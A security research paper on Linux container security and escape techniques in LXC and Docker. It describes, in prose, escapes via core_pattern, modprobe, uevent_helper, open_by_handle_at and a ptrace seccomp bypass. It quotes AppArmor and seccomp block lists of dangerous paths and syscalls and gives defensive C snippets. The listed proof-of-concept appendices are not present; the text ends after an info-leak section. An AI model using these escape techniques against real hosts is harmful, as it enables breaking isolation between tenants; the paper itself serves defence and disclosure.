Copyright 2016 NCC Group

An NCC Group Publication

Abusing Privileged and Unprivileged Linux Containers

Prepared by:
Jesse Hertz

Contents

Introduction
Overview of Container Security
    Containers vs. Virtualization
    Namespaces
    Other Container-Relevant Linux Security Features
The Importance of AppArmor
    Mount Options
    Utility Changes
    Dangerous Paths
The Importance of Seccomp
    Kernel Manipulation
    The Issue With open_by_handle_at()
Abusing Privileged Containers
    SYS_RAWIO Abuse
    The ptrace(2) Hole
Abusing Unprivileged Containers
    PID Namespacing Info-Leak
    NET_RAW abuse
    Denial of Service Attacks
Conclusion
Acknowledgements
Further Reading
References
Appendix: Privileged LXC Escape PoC
Appendix: Cross-Container ARP Spoofing Walkthrough
Appendix: Denial of Service Proof-of-Concept Code
    POSIX Message Queues
    Pending Signals
    Max Processes
    Max Files
    Disk Space
Appendix: /proc/bus/pci Proof-of-Concept Code
    Environment
    Explanation of PoC
    The Code

Introduction

Containers have become increasingly relevant to developers and system administrators for a number of functions. They are used as security measures to isolate processes, as distribution methods for software to guarantee reproducibility, as devops tools for testing and deploying code, and as building blocks for an ecosystem of developer-oriented Platform-as-a-Service (PaaS) products. This paper will examine some of the security mechanisms behind containers and show how they can be exploited. Although this paper focuses primarily on LXC, and also discusses Docker, many of the techniques it demonstrates are applicable to any Linux container system built on the same foundations.
Overview of Container Security

Containers vs. Virtualization

Containers offer a number of advantages and disadvantages compared to virtualization. In most virtualization approaches, a virtual machine (VM) image, representing virtualized filesystems and the state of the machine's memory, is run by the host. To do this, the host wholly emulates the hardware provided to the virtual machine, so the VM runs as if it were on separate hardware. In comparison, containers share a kernel with the host operating system, and the kernel isolates the processes running inside the container using various namespaces. In this way, processes running inside the container appear to run on an isolated Linux host, but in actuality are just "namespaced" processes inside a shared host.

Namespaces

Many Linux namespace features were designed with the goal of making container systems usable and secure [1][2]. The kernel provides a number of namespaces [3] that form the core of modern containerization systems:

IPC: Provides namespaced versions of System V IPC and POSIX message queues. While keeping these IPC mechanisms isolated is important to secure the processes that use them, overall they won't be particularly security-relevant for the purposes of this paper. A later section, "Denial of Service Attacks", discusses attacks against these systems.

Network: Provides a namespaced and isolated network stack. The majority of container use cases involve networked services, so this is a core feature of containers. The section "NET_RAW abuse" will explore exploiting typical flaws in container networking.

Mount: Provides a namespaced view of mount points. Combined with the pivot_root(2) [4] syscall, this is used to isolate the container's filesystem from the host's filesystem. The section "The Issue With open_by_handle_at()" will go over a flaw in this implementation, how it can be exploited, and how this exploitation is prevented in modern container systems.

PID: Provides a namespaced tree of process IDs (PIDs). This allows each container to have a fully isolated process tree, with its own 'init' process running as PID 1 inside this namespace. Processes running in a container have a different PID on the host than they do inside the container's PID namespace. A vulnerability that impacts this namespace will be covered in "PID Namespacing Info-Leak" later in this paper.
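As a small illustration of this PID translation, here is a C sketch (not part of the original research; the function names are hypothetical) that parses the "NSpid:" line of /proc/<pid>/status. It assumes Linux 4.1 or later, where proc(5) documents that line as listing the PID in the namespace of whoever mounted that /proc (normally the host) first, followed by the PID in each nested namespace.

```c
/* Illustrative sketch; parse_nspid() and print_nspids() are hypothetical names. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Parse an "NSpid:" line from /proc/<pid>/status (Linux 4.1+).
 * The first value is the PID in the PID namespace of the process that
 * mounted that /proc; each following value is the PID one level deeper,
 * ending with the PID inside the innermost namespace.
 * Stores up to `max` values in `out`; returns how many values the line held,
 * or 0 if `line` is not an NSpid line.
 */
size_t parse_nspid(const char *line, long *out, size_t max)
{
    static const char prefix[] = "NSpid:";
    size_t n = 0;
    char *end;

    if (strncmp(line, prefix, sizeof prefix - 1) != 0)
        return 0;
    line += sizeof prefix - 1;
    for (;;) {
        long v = strtol(line, &end, 10);   /* skips the tab separators */
        if (end == line)                   /* no further number on the line */
            break;
        if (n < max)
            out[n] = v;
        n++;
        line = end;
    }
    return n;
}

/* Print every PID level found in a status file such as "/proc/self/status".
 * Returns 0 on success, -1 if the file or its NSpid line is unavailable. */
int print_nspids(const char *status_path)
{
    FILE *f = fopen(status_path, "r");
    char line[256];
    long pids[32];
    size_t n = 0;

    if (f == NULL)
        return -1;
    while (n == 0 && fgets(line, sizeof line, f) != NULL)
        n = parse_nspid(line, pids, 32);
    fclose(f);
    if (n == 0)
        return -1;          /* e.g. a kernel older than 4.1 */
    if (n > 32)
        n = 32;
    for (size_t i = 0; i < n; i++)
        printf("namespace level %zu: PID %ld\n", i, pids[i]);
    return 0;
}
```

Pointed from the host at a containerized process (for example print_nspids("/proc/12345/status"), with a made-up host PID), this should print two levels: the host PID and the PID inside the container. Inside a container whose /proc was mounted in its own PID namespace, only the in-container PID is shown, which is exactly the isolation the PID namespace is meant to provide.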
Other Container-Relevant Linux Security Features

A number of other Linux kernel features are involved in the security of a container system (especially before, or without, user namespaces):

User: Provides a namespaced version of User IDs (UIDs) and Group IDs (GIDs). This is one of the most important features of modern container systems, as it is used to provide "unprivileged containers". These are containers in which root (UID 0) inside the container is not root outside the container, greatly increasing the container's security. User namespaces are a relatively large and new kernel feature, and introduced new vulnerabilities in their infancy [5]. They also have some design goals that conflict with Linux capabilities (notably, a user receives a full set of root capabilities in their new user namespace [6]). It is, therefore, extremely important that system calls and security logic be "namespace aware", as checking a capability in the wrong namespace leads to vulnerabilities such as the "CLONE_NEWUSER|CLONE_FS" root exploit [5]. User namespaces provide one of the bedrocks of modern Linux container systems, and containers that use them (unprivileged containers) are the only container configuration that LXC considers secure [7]. In a recent release of Docker Engine (1.10), support for user namespaces has been added [8], although it is not enabled by default. The section "Abusing Unprivileged Containers" will cover ways containers can be exploited even with user namespaces enabled.

UTS: Provides a namespaced version of system identifiers. While this namespace is not particularly security-relevant, it is quite useful for providing container-specific hostnames.

Cgroups: Cgroups [9] (short for control groups) provide a hierarchical interface for managing and metering resources and device access. Cgroups can be used by higher-privileged processes to put limits on lower-privileged processes' memory usage, CPU usage, and block device I/O. They can also be used in conjunction with iptables in order to provide traffic shaping. Most importantly, they are used in container systems to control access to devices [10][11][12].
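To make the device-access point concrete, the following C sketch (an illustration, not LXC or Docker code; the names are hypothetical) parses entries in the cgroup v1 device whitelist format, such as "c 1:3 rwm" (device type, major:minor, and any of read/write/mknod), and checks whether a rule grants a given access. It assumes the v1 devices controller; where its devices.list file is mounted varies by distribution, and cgroup v2 replaces this interface with eBPF programs.

```c
/* Illustrative sketch; struct dev_rule and the functions are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct dev_rule {
    char type;          /* 'a' (all devices), 'b' (block) or 'c' (char) */
    long major, minor;  /* -1 stands for the '*' wildcard */
    int read, write, mknod;
};

static long num_or_wildcard(const char *s)
{
    return strcmp(s, "*") == 0 ? -1 : strtol(s, NULL, 10);
}

/* Parse a cgroup v1 device rule such as "c 1:3 rwm".
 * Returns 0 on success, -1 if the line is malformed. */
int parse_dev_rule(const char *line, struct dev_rule *r)
{
    char maj[16], min[16], acc[8];

    if (sscanf(line, " %c %15[^:]:%15s %7s", &r->type, maj, min, acc) != 4)
        return -1;
    if (r->type != 'a' && r->type != 'b' && r->type != 'c')
        return -1;
    r->major = num_or_wildcard(maj);
    r->minor = num_or_wildcard(min);
    r->read  = strchr(acc, 'r') != NULL;
    r->write = strchr(acc, 'w') != NULL;
    r->mknod = strchr(acc, 'm') != NULL;
    return 0;
}

/* Does rule `r` grant `access` ('r', 'w' or 'm') on device `type` major:minor? */
int dev_rule_allows(const struct dev_rule *r, char type, long major,
                    long minor, char access)
{
    int type_ok  = r->type == 'a' || r->type == type;
    int major_ok = r->major == -1 || r->major == major;
    int minor_ok = r->minor == -1 || r->minor == minor;
    int acc_ok   = (access == 'r' && r->read) || (access == 'w' && r->write) ||
                   (access == 'm' && r->mknod);
    return type_ok && major_ok && minor_ok && acc_ok;
}
```

For instance, a whitelist entry of "c 1:3 rwm" lets a container use /dev/null (character device 1:3), while a request for /dev/mem (character device 1:1) matches no such rule and is refused by the controller.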
Capabilities: Linux capabilities [13] were introduced as a way to break the role of root down into discrete subsections, which can be granted to non-root processes to allow them to perform privileged actions. A process has a "permitted set" of capabilities, which acts as a limiting superset for the capabilities it can use, as well as a "bounding set", which limits the capabilities it can ever acquire. Importantly, and by default, the bounding set is carried over to any child process, so the "init" process of the container creates a limiting set of capabilities for all processes inside the container (as all processes descend from PID 1). It is worth noting that, for privileged containers, Docker drops many more capabilities by default [12] than LXC does [14].
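Inside a container, the effect of dropped capabilities can be checked by reading the hexadecimal "CapBnd:" (bounding set) or "CapEff:" (effective set) lines of /proc/self/status. The following sketch (hypothetical helper names; the capability numbers are copied from <linux/capability.h> so the example has no header dependency) tests whether a given capability bit is set in such a mask.

```c
/* Illustrative sketch; cap_in_mask() and read_cap_field() are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Capability numbers, as defined in <linux/capability.h>. */
enum {
    CAPNUM_DAC_READ_SEARCH = 2,
    CAPNUM_NET_RAW         = 13,
    CAPNUM_SYS_MODULE      = 16,
    CAPNUM_SYS_RAWIO       = 17,
    CAPNUM_SYS_PTRACE      = 19,
    CAPNUM_SYS_ADMIN       = 21,
    CAPNUM_SYS_BOOT        = 22,
};

/* Return 1 if capability number `cap` is set in a hexadecimal mask as
 * printed by /proc/<pid>/status (e.g. "0000003fffffffff"), else 0. */
int cap_in_mask(const char *hexmask, int cap)
{
    unsigned long long mask = strtoull(hexmask, NULL, 16);
    return cap >= 0 && cap < 64 && ((mask >> cap) & 1ULL) != 0;
}

/* Copy the value of a capability line ("CapBnd", "CapEff", ...) of the
 * calling process into `out`. Returns 0 on success, -1 if not found. */
int read_cap_field(const char *field, char *out, size_t outlen)
{
    FILE *f = fopen("/proc/self/status", "r");
    char line[256];
    size_t flen = strlen(field);
    int rc = -1;

    if (f == NULL)
        return -1;
    while (fgets(line, sizeof line, f) != NULL) {
        if (strncmp(line, field, flen) == 0 && line[flen] == ':') {
            const char *val = line + flen + 1;
            val += strspn(val, " \t");          /* skip the separator */
            snprintf(out, outlen, "%s", val);
            out[strcspn(out, "\n")] = '\0';     /* drop the newline */
            rc = 0;
            break;
        }
    }
    fclose(f);
    return rc;
}
```

As an example, the mask 00000000a80425fb, which corresponds to Docker's default list of fourteen capabilities, has NET_RAW (bit 13) set but neither SYS_RAWIO (bit 17) nor DAC_READ_SEARCH (bit 2), whereas a process with a full bounding set on a recent kernel reports a mask such as 0000003fffffffff.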
MAC: Linux Security Modules (LSMs) [15] provide security hooks for Mandatory Access Control (MAC) systems. AppArmor [16] is the most prevalent LSM in container systems, and is the system this paper will discuss. AppArmor profiles can greatly limit the actions that a given program can take, and can also control complex operations (such as pivot_root() calls and other manipulation of the mount namespace). Both LXC and Docker ship, and enable by default, profiles that establish essential security barriers and defense in depth (particularly for privileged containers). Vulnerabilities that would be possible without AppArmor (or with a weak profile) will be explored in the section "The Importance of AppArmor". While AppArmor is not the only LSM that can be used by container systems (SELinux is also supported by LXC [17] and Docker [18]), AppArmor is by far the best supported and documented. It is the default MAC used by both LXC and Docker. Due to the simplicity of the AppArmor syntax, it is also far easier to use for creating customized, per-container profiles.

Seccomp: Seccomp [19] is a mechanism for system call filtering. Seccomp policies come in two versions. In version one, also referred to as "strict" mode, the filter is a small, fixed set of allowed system calls that cannot be customized. In version two, "filter" mode, system call filters are written as Berkeley Packet Filter (BPF) programs. This allows more finely grained policies to be set on system call usage (with some caveats: seccomp-bpf filters can inspect syscall arguments, but cannot dereference pointers [19]). LXC currently uses a relatively simple policy [20], while the 1.10 release of Docker introduced support for seccomp-bpf, as well as a fairly comprehensive example filter [21]. Note that on Docker 1.10, seccomp is not used by default on Ubuntu 14.04 (trusty) (somewhat confusingly, when using Docker 1.10 on Ubuntu 15.10, seccomp is used by default). However, as of Docker 1.11.1, seccomp is used by default on trusty as well. The section "The ptrace(2) Hole" will discuss bypassing seccomp.

The Importance of AppArmor

By examining segments of the AppArmor policy in use by LXC, several "historical" (or theoretical) container breakouts can be understood, providing insight into the need for AppArmor (for the full policies, see [22] for LXC, and [23] for Docker). Docker blocks many of these attacks by mounting /sys and parts of /proc as read-only filesystems, rather than (or in addition to) using AppArmor. Note that with the addition of user namespaces, some of these policies have become defense-in-depth measures, as kernel namespaces should prevent the actions even without AppArmor (as long as the container has limited capabilities in the root user namespace).

Mount Options

First up are the AppArmor policies that block mounting devpts filesystems. As the comment below states, without this the container could remount /dev/pts and get access to the host's terminals.

    # the container may never be allowed to mount devpts.  If it does, it
    # will remount the host's devpts.  We could allow it to do it with
    # the newinstance option (but, right now, we don't).
    deny mount fstype=devpts,

Next are policies to stop the container from attempting to remount the root filesystem. This is mainly done as a defense-in-depth measure.

    # ignore DENIED message on / remount
    deny mount options=(ro, remount) -> /,
    deny mount options=(ro, remount, silent) -> /,

Utility Changes

There are a number of dangerous places in /proc and /sys that allow trivial container escapes.
All of the following involve changing the location of a utility (such as modprobe) that the host will call when certain events happen (such as a kernel module load request). By changing this to point to a program within our container, an attacker can then cause the host to run an arbitrary piece of code outside the container. LXC uses the following rule set to block these attacks. Note that this is not an AppArmor profile; it is the input to a small Python script [24] which generates a long portion of AppArmor rules. The full profile generated by this is at [25].

    # Run lxc-generate-aa-rules.py on this file after any modification, to generate
    # the container-rules file which is appended to container-base.in to create the
    # final abstractions/container-base.
    block /sys
    allow /sys/fs/cgroup/**
    allow /sys/devices/virtual/net/**
    allow /sys/class/net/**
    block /proc/sys
    allow /proc/sys/kernel/shm*
    allow /proc/sys/kernel/sem*
    allow /proc/sys/kernel/msg*
    allow /proc/sys/kernel/hostname
    allow /proc/sys/kernel/domainname
    allow /proc/sys/net/**

So what are the important vectors being blocked?

uevent_helper: uevents are events triggered by the kernel when a device is added or removed [26]. Notably, the path for the "uevent_helper" can be modified by writing to "/sys/kernel/uevent_helper". Then, when a uevent is triggered (which can also be done from userland by writing to files such as "/sys/class/mem/null/uevent"), the malicious uevent_helper gets executed. A nice write-up with example code is available online [27].

modprobe: modprobe [28] is a userland utility invoked when the kernel needs to load a kernel module. Its location can be changed by modifying "/proc/sys/kernel/modprobe" [29], and code execution can then be gained by performing any action which will trigger the kernel to attempt to load a kernel module (such as using the crypto API to load a currently unloaded crypto module, or using ifconfig to load a networking module for a device not currently in use).

core_pattern: core_pattern is usually used to tell the kernel how to name and format the core dumps that are produced when a program crashes. However, it has a terrific feature [30]: "Since kernel 2.6.19, Linux supports an alternate syntax for the /proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the remainder of the line is interpreted as a program to be executed. Instead of being written to a disk file, the core dump is given as standard input to the program." Using this, a core_pattern can be specified that invokes a program of our choice; then, to trigger it, you only need to have a program crash.

/proc/sys/vm/panic_on_oom: This is a global flag that determines whether the kernel will panic when an Out of Memory (OOM) condition is hit (rather than invoking the OOM killer). This opens up a relatively simple denial-of-service attack.
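The core_pattern pipe syntax is easy to detect from either side of the container boundary, since core_pattern is a single kernel-wide setting rather than a per-container one. The sketch below (hypothetical names; an illustration rather than a tool from this research) reads /proc/sys/kernel/core_pattern and reports whether a pipe helper is configured and which program it names. That helper is started by the kernel on the host, outside the container, which is why write access to this file is equivalent to code execution on the host.

```c
/* Illustrative sketch; both function names are hypothetical. */
#include <stdio.h>
#include <string.h>

/*
 * Given the contents of /proc/sys/kernel/core_pattern: if the pattern uses
 * the pipe syntax ("|program args..."), copy the program path (the first
 * whitespace-delimited word after '|') into `prog` and return 1.
 * Return 0 for an ordinary file-name pattern. `len` must be at least 1;
 * an over-long path is truncated rather than overflowing `prog`.
 */
int core_pattern_pipe_program(const char *pattern, char *prog, size_t len)
{
    size_t n;

    if (pattern[0] != '|')
        return 0;
    pattern++;
    n = strcspn(pattern, " \t\n");
    if (n >= len)
        n = len - 1;
    memcpy(prog, pattern, n);
    prog[n] = '\0';
    return 1;
}

/* Read the current pattern into `buf`. Returns 0 on success, -1 on error. */
int read_core_pattern(char *buf, size_t len)
{
    FILE *f = fopen("/proc/sys/kernel/core_pattern", "r");

    if (f == NULL)
        return -1;
    if (fgets(buf, (int)len, f) == NULL) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return 0;
}
```

For example, on many Ubuntu systems with apport enabled, the pattern starts with "|/usr/share/apport/apport", so core_pattern_pipe_program() would return 1 and report that path.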
Dangerous Paths

    # block some other dangerous paths
    deny @{PROC}/kcore rwklx,
    deny @{PROC}/kmem rwklx,
    deny @{PROC}/mem rwklx,
    deny @{PROC}/sysrq-trigger rwklx,

kcore: /proc/kcore provides a full dump of the physical memory of the system in the core file format [31]. It does not allow writing to said memory. Access to this allows a container to trivially read all of host memory.

kmem: /proc/kmem is an alternate interface for /dev/kmem [32] (direct access to which is blocked by the cgroup device whitelist), which is a character device file representing kernel virtual memory. It allows both reading and writing, allowing direct modification of kernel memory.

mem: /proc/mem is an alternate interface for /dev/mem [32] (direct access to which is blocked by the cgroup device whitelist), which is a character device file representing the physical memory of the system. It allows both reading and writing, allowing modification of all memory. (It requires slightly more finesse than kmem, as virtual addresses need to be resolved to physical addresses first.)

sysrq-trigger: Writing to this special file allows sending System Request Key commands [33], which allow a number of privileged actions, such as killing processes, listing all processes on the system, or triggering a host reboot [34].
The final important section blocks writes to several different places which could be dangerous:

    # deny writes in /sys except for /sys/fs/cgroup, also allow
    # fusectl, securityfs and debugfs to be mounted there (read-only)
    deny mount fstype=debugfs -> /var/lib/ureadahead/debugfs/,
    deny /sys/firmware/efi/efivars/** rwklx,
    deny /sys/kernel/security/** rwklx,
    deny @{PROC}/sys/fs/** wklx,

debugfs: debugfs provides a "no rules" interface by which the kernel (or kernel modules) can create debugging interfaces accessible to userland [35]. It has had a number of security issues in the past [36], and the "no rules" guidelines behind the filesystem have often clashed with security constraints [37]. Inside an LXC container, it is mounted read-only.

/sys/firmware/efi/efivars: efivars provides an interface to write to the NVRAM used for UEFI boot arguments [38]. Modifying them can render the host machine unbootable (and has done so on some recent systems [39]).

/sys/kernel/security: Mounted here is the securityfs interface, which allows configuration of Linux Security Modules [40]. Most relevant for our purposes, this allows configuration of AppArmor policies [41], so access to this may allow a container to disable its MAC system.

/proc/sys/fs: From the Red Hat documentation [42]: "This directory contains an array of options and information concerning various aspects of the file system, including quota, file handle, inode, and dentry information." Write access to this directory would allow various denial-of-service attacks against the host.
The Importance of Seccomp

Seccomp-BPF allows for configurable filtering of dangerous system calls. For several versions now, LXC has shipped with a very small and simple seccomp policy [20], which is illustrated below. With the Docker 1.10 release, Docker introduced a much more complex policy [21] (which is used by default on certain platforms in 1.10, and by default on trusty as well in 1.11.1).

    2
    blacklist
    reject_force_umount  # comment this to allow umount -f;  not recommended
    [all]
    kexec_load errno 1
    open_by_handle_at errno 1
    init_module errno 1
    finit_module errno 1
    delete_module errno 1

The first piece of the LXC policy is intended as a defense-in-depth measure to stop containers from forcibly unmounting pieces of their filesystem, which may have security consequences. The more interesting section is the blacklisting of certain dangerous syscalls.

Kernel Manipulation

Several system calls which allow manipulating kernel modules are banned (init_module(2), finit_module(2), and delete_module(2)), as well as kexec_load(2), which allows replacing the currently running kernel with a new kernel image. Note that there is some defense in depth against exploiting these in privileged containers:

init_module(2) [43], finit_module(2) [44] and delete_module(2) [45]: These all require the SYS_MODULE capability, which is dropped by Docker and LXC in privileged containers.

kexec_load(2) [46]: kexec_load(2) does not require SYS_MODULE. Instead, it requires SYS_BOOT, which privileged LXC containers retain. In most situations, this isn't exploitable (without bypassing seccomp); however, it is worth noting that Linux 3.17 introduced a new kexec variant: kexec_file_load(2) [46]. This call (meant for loading signed kernels) is not on the seccomp blacklist for a privileged LXC container, and only requires SYS_BOOT. However, privileged LXC containers have a number of other issues allowing reliable container escape without needing to boot into a new kernel (since we can in fact bypass seccomp!). For the eager reader, feel free to head right to "The ptrace(2) Hole" and "Appendix: Privileged LXC Escape PoC".
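For readers unfamiliar with seccomp-bpf, the following C sketch shows roughly what a filter equivalent to the [all] section of the LXC blacklist above looks like. It is not LXC's implementation (LXC builds its filter through libseccomp); the function name is hypothetical, and it assumes an x86-64 or AArch64 build with Linux kernel headers installed. Matching syscalls fail with EPERM, which is what "errno 1" means in the policy.

```c
/* Illustrative sketch; install_lxc_style_blacklist() is a hypothetical name. */
#include <errno.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#if defined(__x86_64__)
#  define FILTER_AUDIT_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#  define FILTER_AUDIT_ARCH AUDIT_ARCH_AARCH64
#else
#  error "set FILTER_AUDIT_ARCH for this architecture"
#endif

/* If the loaded syscall number equals `nr`, fail the call with EPERM
 * (the "errno 1" action in the LXC policy); otherwise fall through. */
#define DENY_EPERM(nr)                                        \
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (nr), 0, 1),          \
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA))

/* Install a filter approximating the [all] section of the LXC blacklist.
 * Returns 0 on success, -1 (errno set) on failure. */
int install_lxc_style_blacklist(void)
{
    struct sock_filter filter[] = {
        /* Kill the process if the syscall uses an unexpected ABI (e.g. i386
         * calls on x86-64). x32 calls share AUDIT_ARCH_X86_64 and would
         * need an extra check in a production filter. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, FILTER_AUDIT_ARCH, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),

        /* Load the syscall number and check it against the blacklist.
         * Like the LXC policy, kexec_file_load is NOT listed here. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        DENY_EPERM(SYS_kexec_load),
        DENY_EPERM(SYS_open_by_handle_at),
        DENY_EPERM(SYS_init_module),
        DENY_EPERM(SYS_finit_module),
        DENY_EPERM(SYS_delete_module),

        /* Blacklist semantics: everything else is allowed. */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof filter / sizeof filter[0]),
        .filter = filter,
    };

    /* Lets a process without CAP_SYS_ADMIN install a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == 0 ? 0 : -1;
}
```

After install_lxc_style_blacklist() succeeds, syscall(SYS_kexec_load, ...) fails with EPERM while other calls behave normally. As discussed in "The ptrace(2) Hole", a filter like this does not, on its own, stop a process that can ptrace(2) another process running under the same filter.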
The Issue With open_by_handle_at()

open_by_handle_at(2) [47] is an interesting system call. It was originally introduced into the kernel to support userspace file servers. This was desired so that processes could easily pass unique file identifiers between each other, rather than pass file descriptors over Unix domain sockets. However, open_by_handle_at(2) is a security nightmare. Any process with the capability DAC_READ_SEARCH can use open_by_handle_at(2) to gain access to any file, even files outside its mount namespace. The handle passed into open_by_handle_at(2) is intended to be an opaque identifier retrieved using name_to_handle_at(2) [47]. However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer [48] (and branded as "Shocker"). At the time of its release, this affected both LXC and Docker (which was at the time powered by LXC). It was also an issue in OpenVZ [49] (another container system, which has since declined in popularity). Docker has mitigated this issue by dropping DAC_READ_SEARCH (as well as blocking access to open_by_handle_at using seccomp).

LXC mitigates this issue in unprivileged containers through user namespaces, and also blocks this system call through seccomp by default. This seccomp policy can be disabled in both privileged and unprivileged LXC containers using "The ptrace(2) Hole", so cautious users are advised to configure their unprivileged LXC containers to also drop DAC_READ_SEARCH (and perhaps SYS_PTRACE). For a great write-up on how the "Shocker" exploit works, see [50]. In "Appendix: Privileged LXC Escape PoC", these mitigations are discussed in a bit more detail, and code is provided to escape a privileged LXC container by using ptrace(2) to bypass seccomp and then abusing open_by_handle_at(2).
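To see why the handle is not really opaque, the following C sketch (hypothetical names) calls name_to_handle_at(2), which needs no special capability, and prints the handle's type and size next to the file's inode number from stat(2). It assumes the layout used by filesystems such as ext4, where handle type 1 (FILEID_INO32_GEN in the kernel's include/linux/exportfs.h) is a 32-bit inode number followed by a 32-bit generation number; other filesystems use other layouts, and some (procfs, for example) do not support handles at all.

```c
/* Illustrative sketch; handle_ino32() and show_handle() are hypothetical. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* FILEID_INO32_GEN from the kernel's exportfs.h: 32-bit inode number
 * followed by a 32-bit generation number. */
#define HANDLE_TYPE_INO32_GEN 1

/* Read the inode number stored at the start of an INO32_GEN handle body
 * (kept in the kernel's native byte order). */
uint32_t handle_ino32(const unsigned char *body)
{
    uint32_t ino;

    memcpy(&ino, body, sizeof ino);
    return ino;
}

/* Get the handle for `path` and compare it with stat(2). Returns 0 on
 * success, -1 with errno set otherwise (EOPNOTSUPP means the filesystem
 * does not support file handles). */
int show_handle(const char *path)
{
    struct file_handle *fh = malloc(sizeof *fh + MAX_HANDLE_SZ);
    struct stat st;
    int mount_id, saved;

    if (fh == NULL)
        return -1;
    fh->handle_bytes = MAX_HANDLE_SZ;
    if (name_to_handle_at(AT_FDCWD, path, fh, &mount_id, 0) == -1 ||
        stat(path, &st) == -1) {
        saved = errno;
        free(fh);
        errno = saved;
        return -1;
    }
    printf("%s: handle type=%d bytes=%u, st_ino=%llu\n", path,
           fh->handle_type, fh->handle_bytes, (unsigned long long)st.st_ino);
    if (fh->handle_type == HANDLE_TYPE_INO32_GEN && fh->handle_bytes >= 8)
        printf("  inode stored in handle: %u\n",
               (unsigned)handle_ino32(fh->f_handle));
    free(fh);
    return 0;
}
```

On an ext4 file, the inode stored in the handle should match st_ino. Since inode numbers are small and predictable (the root directory of an ext4 filesystem is inode 2), a process that is allowed to call open_by_handle_at(2) does not need to obtain handles legitimately; it can construct them, which is the core of the "Shocker" attack.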
Abusing Privileged Containers

SYS_RAWIO Abuse

From an analysis of capabilities not dropped by default inside privileged LXC containers, SYS_RAWIO stood out as abusable, since it is used all over the kernel in a number of security-sensitive contexts. This led the author to the discovery of a container escape on LXC privileged containers [51], which was disclosed to the LXC team, who then added a security page to their site [7] in order to clarify that privileged containers are not considered secure. Newer versions of LXC now also drop SYS_RAWIO and have additional AppArmor rules to block access to /proc/bus.

From within a container, it is possible to access the "control regions" of devices attached to the host PCI bus by using the /proc/bus/pci/ interface. Access to this /proc interface requires the SYS_RAWIO capability. Even if this path in /proc were blocked through AppArmor, a container with SYS_RAWIO could still access this interface through the iopl(2)/ioperm(2) syscalls (and then using inb(2), outb(2) and friends [52][53] to access the I/O ports). Note that Docker is not vulnerable to this, since (aside from limited portions) /proc is typically mounted read-only, and SYS_RAWIO is dropped. For proof-of-concept code using this to send raw AHCI commands to the hard disk, see "Appendix: /proc/bus/pci Proof-of-Concept Code".

In the response to this bug, the LXC team commented that they consider LXC privileged containers inherently unsafe, as there is a known and "unfixable" hole in LXC's privileged containers involving ptrace(2) to bypass seccomp (also a known seccomp limitation, as discussed below).

The ptrace(2) Hole

Unfortunately, documentation on using ptrace(2) to bypass seccomp is rather sparse. It's mentioned in passing in a kernel mailing list thread [54], but perhaps the most definitive reference is this section of the kernel seccomp documentation [55] discussing using ptrace(2) to inspect system calls:

    The seccomp check will not be run again after the tracer is notified. (This means that seccomp-based sandboxes MUST NOT allow use of ptrace, even of other sandboxed processes, without extreme care; ptracers can use this mechanism to escape.)

The "vulnerability" itself is a simple Time-of-Check-to-Time-of-Use (TOCTTOU) issue: seccomp filtering is applied before the tracer is notified (and before the syscall is actually executed), so the tracer may modify the registers used in the system call (after they have been inspected by seccomp) to turn what was a benign system call into a malicious one. A clear demonstration of this is Jann Horn's proof-of-concept code for bypassing a seccomp policy using ptrace(2) [56]. In "Appendix: Privileged LXC Escape PoC", you'll find a full proof-of-concept for an LXC privileged container escape, using the ptrace(2) hole to bypass seccomp, and then open_by_handle_at(2) in order to escape the container.

Interestingly, the way Docker mitigates this issue is simply to disallow using ptrace(2) inside containers (by dropping SYS_PTRACE by default). While seccomp can be disabled using ptrace in LXC unprivileged containers, abusing open_by_handle_at(2) will fail, since the contained process lacks DAC_READ_SEARCH in the root namespace (see "Appendix: Privileged LXC Escape PoC" for a slightly more in-depth explanation). With the recent addition of user namespaces to Docker, it is possible that ptrace(2) will be allowed inside Docker containers in the future (although this is unlikely, given Docker's recent focus on seccomp [8]).

Despite LXC privileged containers being inherently unsafe, in this author's opinion, finding privileged container breakouts can be a fun exercise (and such findings can often make privileged containers slightly more safe: e.g. after the /proc/bus/ issue was reported, new AppArmor rules were added and SYS_RAWIO was dropped by default). So to any interested readers, go forth and hunt! I'd love to hear about what you find.

Abusing Unprivileged Containers

The following section covers some known weaknesses in unprivileged containers, along with demonstrations of how they can be exploited. The following tests were performed on a default Docker 1.10 setup [57] (which, on trusty, does not use user namespaces or seccomp by default), as well as on a default LXC 1.0.8 setup [58] (which does use both user namespaces and seccomp by default), on a default Vagrant Ubuntu Trusty64 VM. While Docker containers started this way are not unprivileged, all the following attacks were found on an unprivileged LXC container, and then verified to work in (default, privileged) Docker as well.

PID Namespacing Info-Leak

While exploring unprivileged containers, the author discovered an interesting info-leak: the "/proc/sched_debug" file. This pseudo-file allows an unprivileged user to view debug information for the Linux scheduler, and is not PID-namespace aware. As such, it discloses the names and PIDs of all processes running on the system (and even their task group (cgroup), making it easy to identify other containers on the system and what container system is in place). The author reported this info-leak to both Docker and LXC, and it was then patched in Docker [59].

